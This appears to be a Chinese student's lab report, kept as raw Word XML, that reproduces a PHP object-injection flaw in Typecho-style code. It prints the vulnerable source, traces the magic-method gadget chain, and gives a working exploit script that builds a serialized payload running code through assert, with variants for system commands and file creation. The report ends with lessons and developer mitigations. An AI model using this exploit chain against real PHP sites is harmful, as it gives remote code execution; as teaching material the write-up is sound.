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center"/>
        <w:textAlignment w:val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righ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2112060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孙蕗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班级： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息安全一班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right"/>
        <w:textAlignment w:val="auto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复现反序列化漏洞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jc w:val="left"/>
        <w:textAlignment w:val="auto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复现12.2.3中的反序列化漏洞，并执行其他的系统命令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jc w:val="left"/>
        <w:textAlignment w:val="auto"/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PHP反序列化漏洞又叫PHP对象注入漏洞。在一个应用中，如果传给unserialize()的参数是用户可控的，那么攻击者就可以通过传入一个精心构造的序列化字符串，利用PHP魔术方法来控制对象内部的变量甚至是函数。对这一类漏洞的利用，往往需要分析web应用的源代码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/*typecho.php*/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&lt;?php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class Typecho_Db{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public function _construct($adapterName){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$adapterName ='Typecho_Db_Adapter_'.$adapterName;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class Typecho_Feed{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private $item;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public function _toString(){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$this-&gt;item['author']-&gt;screenName;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class Typecho_Request{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private $_params = array();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private $_filter = array();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public function __get($key){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return $this-&gt;get($key);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public function get($key,$default = NULL)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{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switch(true){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case isset($this-&gt;_params[$key]):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$value =$this-&gt;_params[$key];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break;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default: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$value =$default;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break;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$value =!is_array($value)&amp;&amp; strlen($value)&gt;0? $value:$default;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return $this-&gt;_applyFilter($value);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private function _applyFilter($value)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{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if ($this-&gt;_filter){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foreach ($this-&gt;_filter as $filter){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$value = is_array($value)? array_map($filter,$value):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call_user_func($filter, $value);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$this-&gt;_filter = array();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return $value;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$config=unserialize(base64_decode($_GET['__typecho_config']));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$db=new Typecho_Db($config['adapter']);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?&gt;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该web应用通过$_GET[‘_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>typecho_config']从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，unserialize()的参数可控，这里是漏洞的入口点。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接下来，程序实例化了类Typecho_Db,类的参数是通过反序列化得到的$config。在类Typecho_Db的构造函数中，进行了字符串拼接的操作，而在PHP魔术方法中，如果一个类被当做字符串处理，那么类中的_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>toString()方法将会被调用。全局搜索，发现类Typecho_Feed中存在_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>toString()方法。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在类Typecho_Feed的_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>toString()方法中，会访问类中私有变量$item['author']中的screenName,这里又有一个PHP反序列化的知识点，如果$item[‘author']是一个对象，并且该对象没有screenName属性，那么这个对象中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>_get(),方法将会被调用，在Typecho_Request类中，正好定义了_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>get()方法。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类Typecho_Request中的_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>get()方法会返回get(),get()中调用了_applyFilter()方法，而在_applyFilter()中，使用了PHP的call_user_func()函数，其第一个参数是被调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>函数，第二个参数是被调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>函数的参数，在这里$filter,$value都是我们可以控制的，因此可以用来执行任意系统命令。至此，一条完整的利用链构造成功。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根据上述思路，写出对应的利用代码：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/*exp.php*/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&lt;?php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class Typecho_Feed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{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private $item;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public function _construct(){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$this-&gt;item = array(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'author'=&gt;new Typecho_Request(),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);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class Typecho_Request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{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private $_params = array();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private $_filter = array();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public function _construct(){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$this-&gt;_params['screenName']='phpinfo()';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$this-&gt;_filter[0]='assert';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$exp = array(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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>'adapter'=&gt; new Typecho_Feed()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);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echo base64_encode(serialize($exp));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?&gt;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上述代码中用到了PHP的assert()函数，如果该函数的参数是字符串，那么该字符串会被assert()当做PHP代码执行，这一点和PHP一句话木马常用的eval()函数有相似之处。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>便是我们执行的PHP代码，如果想要执行系统命令，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>替换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>system(‘1s');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>即可，注意最后有一个分号。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如果想要创建一个文件，代码如下：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$this-&gt;_params['screenName']='fopen(\newfile.txt\',\'w\');'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$this-&gt;_filter[0]='assert';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访问exp.php便可以获得payload,通过get请求的方式传递给typecho.php后，phpinfo()成功执行。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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="471170"/>
            <wp:effectExtent l="0" t="0" r="139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b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1821815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本次实验了解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>了反序列化漏洞的原理和利用方式。通过分析代码、理解魔术方法和掌握反序列化知识点，成功构造了利用链并执行了系统命令。这对于理解安全漏洞和进行代码审计非常重要。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当应用接受用户控制的序列化数据并传递给unserialize()函数时，攻击者可以通过构造恶意的序列化字符串来执行任意代码。这种漏洞可能导致远程代码执行，进而危及整个系统的安全性。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  <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>对于开发人员来说，在编写代码时应当注意输入的可控性，尤其是在处理反序列化操作时，要对传入的数据进行充分的验证和过滤，以防止恶意序列化攻击。另外，定期更新和修复使用的框架和库，以避免已知的漏洞被利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mNzU4MmJiMGFiOWZlMWQwNWVhOWRiZTc2ZDdiZGYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="001F1E13"/>
    <w:rsid w:val="0000472F"/>
    <w:rsid w:val="00015EEE"/>
    <w:rsid w:val="000C408B"/>
    <w:rsid w:val="00114A1E"/>
    <w:rsid w:val="00125861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1852FBD"/>
    <w:rsid w:val="027D0F8C"/>
    <w:rsid w:val="04A0538B"/>
    <w:rsid w:val="078C3657"/>
    <w:rsid w:val="07D57A72"/>
    <w:rsid w:val="09BE7F3C"/>
    <w:rsid w:val="12543297"/>
    <w:rsid w:val="1BB27AA1"/>
    <w:rsid w:val="1F622E4C"/>
    <w:rsid w:val="26BA12DF"/>
    <w:rsid w:val="282C5C7A"/>
    <w:rsid w:val="2B373B1E"/>
    <w:rsid w:val="33370B5F"/>
    <w:rsid w:val="34EF058C"/>
    <w:rsid w:val="356470DA"/>
    <w:rsid w:val="3574578E"/>
    <w:rsid w:val="414E3ACC"/>
    <w:rsid w:val="463D7DE3"/>
    <w:rsid w:val="48EB611C"/>
    <w:rsid w:val="4D2F771E"/>
    <w:rsid w:val="51220D59"/>
    <w:rsid w:val="52E55A8A"/>
    <w:rsid w:val="5EF152D6"/>
    <w:rsid w:val="66062A2F"/>
    <w:rsid w:val="67276ADA"/>
    <w:rsid w:val="6A614905"/>
    <w:rsid w:val="73C5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4</Pages>
  <Words>1063</Words>
  <Characters>2667</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>10</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2837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sl</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-04T03:16:52Z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19422F70D81B4DDCB582099764804750_12</vt:lpwstr>
  </property>
</Properties>
</file>